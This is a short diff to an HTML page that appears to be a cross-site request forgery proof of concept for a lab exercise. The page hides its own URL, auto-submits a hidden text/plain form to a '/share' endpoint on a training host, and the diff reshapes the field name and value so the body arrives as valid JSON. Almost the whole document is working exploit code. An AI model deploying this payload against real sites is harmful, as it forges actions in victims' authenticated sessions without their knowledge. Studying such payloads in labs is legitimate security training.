--- a/cs.html
+++ b/cs.html
@@ -2,8 +2,7 @@
   <body>
   <script>history.pushState('', '', '/')</script>
     <form action="http://ptl-0764f291-b65a5a79.libcurl.so/share" method="POST" enctype="text/plain">
-      <input type="hidden" name="&#123;&quot;user&quot;&#58;&quot;test&quot;&#44;&quot;id&quot;&#58;0&#125;" value="" />
-      <input type="submit" value="Submit request" />
+      <input type="hidden" name='{"user":"test","id":"0' value='"}' />
     </form>
     <script>
       document.forms[0].submit();
